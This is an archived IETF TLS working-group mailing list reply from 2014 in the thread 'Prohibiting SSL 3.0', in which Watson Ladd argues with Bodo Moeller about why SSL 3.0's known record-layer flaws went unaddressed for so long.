Re: [TLS] Prohibiting SSL 3.0
Watson Ladd <watsonbladd@gmail.com> Fri, 31 October 2014 14:15 UTC
Return-Path: <watsonbladd@gmail.com>
X-Original-To: tls@ietfa.amsl.com
Delivered-To: tls@ietfa.amsl.com
Received: from localhost (ietfa.amsl.com [127.0.0.1]) by ietfa.amsl.com (Postfix) with ESMTP id 3CDC81A007D for <tls@ietfa.amsl.com>; Fri, 31 Oct 2014 07:15:08 -0700 (PDT)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -2
X-Spam-Level:
X-Spam-Status: No, score=-2 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, FREEMAIL_FROM=0.001, SPF_PASS=-0.001] autolearn=ham
Received: from mail.ietf.org ([4.31.198.44]) by localhost (ietfa.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id AVqLXdn7tFgw for <tls@ietfa.amsl.com>; Fri, 31 Oct 2014 07:15:05 -0700 (PDT)
Received: from mail-yk0-x230.google.com (mail-yk0-x230.google.com [IPv6:2607:f8b0:4002:c07::230]) (using TLSv1 with cipher ECDHE-RSA-RC4-SHA (128/128 bits)) (No client certificate requested) by ietfa.amsl.com (Postfix) with ESMTPS id 9E2911A0013 for <tls@ietf.org>; Fri, 31 Oct 2014 07:15:05 -0700 (PDT)
Received: by mail-yk0-f176.google.com with SMTP id 10so3320273ykt.35 for <tls@ietf.org>; Fri, 31 Oct 2014 07:15:04 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type:content-transfer-encoding; bh=Zb97qfO2O7HRRJGxl6XAHaH0BfuReaG7u5yqRAlGuZU=; b=l0yMRLAUkKsg9Fa8uuSkfi0HP2qhEJ979wRJF+Bzdm07LeKIsinBwXsT+TzDCKTFJp z5bclEzc3ErCHAyPDMz4wuev/SZ4CWHIFsvY/nPWA5a9qwqfsLW885ru8L3ypGP5IF9r JmfV+kPdezP8c4R1Gv7cNOJEIB0DXzqdDs5xyM/scbhf001yN+CpbFOOSkwa+lBie9wH Z+4UvQOqxyw6G+YaMyo4d0M+NUADaQmvhQPM8mlhztjVdEskfZKQmoy9oIsdnjCW5qWn RGG6zXkg3MOkgEuE0UWCokJT0TSrPmeor1TGhbdOl+7HExA4E/x8zp6HuId5XfdNtgUY 1Omg==
MIME-Version: 1.0
X-Received: by 10.170.214.6 with SMTP id g6mr5328630ykf.34.1414764904851; Fri, 31 Oct 2014 07:15:04 -0700 (PDT)
Received: by 10.170.195.149 with HTTP; Fri, 31 Oct 2014 07:15:04 -0700 (PDT)
In-Reply-To: <CADMpkc+sBA8X4XodX2S_S4jTkpixzJfQ82UKUQyF-_fHG5Vqrg@mail.gmail.com>
References: <BLU177-W4981235CC3AA2325B8CC01C39F0@phx.gbl> <20141031010310.2F9631AF6E@ld9781.wdf.sap.corp> <CACsn0cn0CFxt-tnnkTr8OF41uLxx8SGTNM8yK90SUiJDPgcN_Q@mail.gmail.com> <CADMpkc+sBA8X4XodX2S_S4jTkpixzJfQ82UKUQyF-_fHG5Vqrg@mail.gmail.com>
Date: Fri, 31 Oct 2014 07:15:04 -0700
Message-ID: <CACsn0c=3RFSRAbw5tvgK+WwPwXFc6n59nr+yWdfxWJbc9m0CVQ@mail.gmail.com>
From: Watson Ladd <watsonbladd@gmail.com>
To: Bodo Moeller <bmoeller@acm.org>
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable
Archived-At: http://mailarchive.ietf.org/arch/msg/tls/VZho_pDdXNHxTvkyME19Qba2ZEw
Cc: "tls@ietf.org" <tls@ietf.org>
Subject: Re: [TLS] Prohibiting SSL 3.0
X-BeenThere: tls@ietf.org
X-Mailman-Version: 2.1.15
Precedence: list
List-Id: "This is the mailing list for the Transport Layer Security working group of the IETF." <tls.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/tls>, <mailto:tls-request@ietf.org?subject=unsubscribe>
List-Archive: <http://www.ietf.org/mail-archive/web/tls/>
List-Post: <mailto:tls@ietf.org>
List-Help: <mailto:tls-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/tls>, <mailto:tls-request@ietf.org?subject=subscribe>
X-List-Received-Date: Fri, 31 Oct 2014 14:15:08 -0000
On Oct 31, 2014 6:18 AM, "Bodo Moeller" <bmoeller@acm.org> wrote: > > Watson Ladd <watsonbladd@gmail.com>: > >> No, the root of all evil is hiring a biology student for a summer to >> make a security protocol. It's a miracle SSLv3 works at all, showing >> that the Lord protects drunks, fools, and interns. > > > I don't think that's fair to Paul Kocher; see also https://www.usenix.org/legacy/publications/library/proceedings/ec96/full_papers/wagner/wagner.pdf for a protocol analysis done by people that I think don't have a biology background. (Was Paul an intern or a paid consultant at that time? I thought the latter [cf. http://www.informatik.uni-trier.de/~ley/pers/hd/k/Kocher:Paul_C=]. He'd been a consultant to RSA Data Security before, although the only thing I seem to remember about his work at that time was that he found not much wrong with RC4.) Paul Kocher did invent side channel analysis a few years later. Contrast TLS response to protocol flaws to that of IPsec: The first round of IPsec was terrible. So a second version was developed, which was much better and is widely used today. By contrast, the improved version of SSL v3 wasn't, and each successive version never fully addressed the security issues. > > It seems pretty safe to say that Phil Rogaway would have been able to spot additional problems and improve the SSL 3.0 protocol, but this was years before there was a systematic understanding of many of the relevant concepts. Chosen-ciphertext attacks were a thing, but "authenticated encryption" was unheard of. This was even before http://web.cs.ucdavis.edu/~rogaway/papers/sym-enc.pdf You're understating the degree of knowledge at the time, and overstating the extent to which open questions needed to be answered to see that SSL v3 was flawed. Again, read what Rogaway said about IPsec, and ask "did this apply to SSL?" No one would have caught the decryption oracle in PKCS 1.5 or renegotiation, or Triple Handshake at the time. But all the attacks we're discussing rely on record layer choices that were known at the time they were made to have secure alternatives. Was the Rogaway IPsec comment document not written in the 1994-1995 period? The question is not why SSL v3 got it wrong. The question is why we didn't get it right a few years later, and stop using broken protocols. You wrote in 2004 that one byte could be extracted from a SSL v3 ciphertext, thus breaking confidentiality completely. Yet it's not until 2014 that this actually leads to action on depreciating SSL v3. Sincerely, Watson Ladd > > Bodo > > > _______________________________________________ > TLS mailing list > TLS@ietf.org > https://www.ietf.org/mailman/listinfo/tls >
- [TLS] Prohibiting SSL 3.0 Yuhong Bao
- Re: [TLS] Prohibiting SSL 3.0 Martin Thomson
- Re: [TLS] Prohibiting SSL 3.0 Florian Weimer
- Re: [TLS] Prohibiting SSL 3.0 Hubert Kario
- Re: [TLS] Prohibiting SSL 3.0 Peter Gutmann
- Re: [TLS] Prohibiting SSL 3.0 Florian Weimer
- Re: [TLS] Prohibiting SSL 3.0 Ilari Liusvaara
- Re: [TLS] Prohibiting SSL 3.0 Manuel Pégourié-Gonnard
- Re: [TLS] Prohibiting SSL 3.0 Bodo Moeller
- Re: [TLS] Prohibiting SSL 3.0 Eric Rescorla
- Re: [TLS] Prohibiting SSL 3.0 Manuel Pégourié-Gonnard
- Re: [TLS] Prohibiting SSL 3.0 Salz, Rich
- Re: [TLS] Prohibiting SSL 3.0 Hubert Kario
- Re: [TLS] Prohibiting SSL 3.0 Yoav Nir
- Re: [TLS] Prohibiting SSL 3.0 Hubert Kario
- Re: [TLS] Prohibiting SSL 3.0 Yoav Nir
- Re: [TLS] Prohibiting SSL 3.0 Hubert Kario
- Re: [TLS] Prohibiting SSL 3.0 Martin Rex
- Re: [TLS] Prohibiting SSL 3.0 Manuel Pégourié-Gonnard
- Re: [TLS] Prohibiting SSL 3.0 Martin Rex
- Re: [TLS] Prohibiting SSL 3.0 Watson Ladd
- Re: [TLS] Prohibiting SSL 3.0 Martin Rex
- Re: [TLS] Prohibiting SSL 3.0 Geoffrey Keating
- Re: [TLS] Prohibiting SSL 3.0 Watson Ladd
- Re: [TLS] Prohibiting SSL 3.0 Bodo Moeller
- Re: [TLS] Prohibiting SSL 3.0 Watson Ladd
- Re: [TLS] Prohibiting SSL 3.0 Bodo Moeller
- Re: [TLS] Prohibiting SSL 3.0 Watson Ladd
- Re: [TLS] Prohibiting SSL 3.0 Sean Turner
- Re: [TLS] Prohibiting SSL 3.0 Joseph Salowey
- Re: [TLS] Prohibiting SSL 3.0 Yuhong Bao
- Re: [TLS] Prohibiting SSL 3.0 Yoav Nir
- Re: [TLS] Prohibiting SSL 3.0 Dave Garrett
- Re: [TLS] Prohibiting SSL 3.0 Jeffrey Walton
- Re: [TLS] Prohibiting SSL 3.0 Yoav Nir